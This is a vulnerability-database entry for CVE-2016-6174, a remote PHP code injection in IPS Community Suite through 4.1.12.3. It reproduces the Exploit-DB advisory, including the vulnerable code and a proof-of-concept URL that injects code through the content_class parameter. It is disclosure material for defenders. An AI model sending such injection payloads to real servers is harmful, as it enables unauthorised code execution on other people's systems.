CVE-2016-6174

high

Published 2016-07-12 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

8.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

9.1

Description

applications/core/modules/front/system/content.php in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) before 4.1.13, when used with PHP before 5.4.24 or 5.5.x before 5.5.8, allows remote attackers to execute arbitrary code via the content_class parameter.

Predictions

Exploit likelihood

88%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-40084 webapps php text · 2 KB

Egidio Romano · 2016-07-11

IPS Community Suite 4.1.12.3 - PHP Code Injection

text exploit Source: Exploit-DB

---------------------------------------------------------------------------
IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
---------------------------------------------------------------------------


[-] Software Link:

https://invisionpower.com/


[-] Affected Versions:

Version 4.1.12.3 and prior versions.


[-] Vulnerability Description:

The vulnerable code is located in the /applications/core/modules/front/system/content.php script:

38.	$class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
39.	
40.	if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
41.	{
42.	    \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
43.	}

User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script:

171.	if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
172.	{
173.	    $databaseId = mb_substr( $class, 14 );
174.	    eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
175.	}

Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.


[-] Proof of Concept:

http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*


[-] Solution:

Update to version 4.1.13 or later.


[-] Disclosure Timeline:

[04/07/2016] - Vendor notified
[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
[06/07/2016] - CVE number requested
[06/07/2016] - CVE number assigned
[07/07/2016] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2016-6174 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-11

Application impact

Vendor	Product	Versions
invisioncommunity	invision_power_board	`{"endIncluding":"4.1.12.3"}`
php	php	`{"endIncluding":"5.4.23"}`
php	php	`5.5.0`
php	php	`5.5.1`
php	php	`5.5.2`
php	php	`5.5.3`
php	php	`5.5.4`
php	php	`5.5.5`
php	php	`5.5.6`
php	php	`5.5.7`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.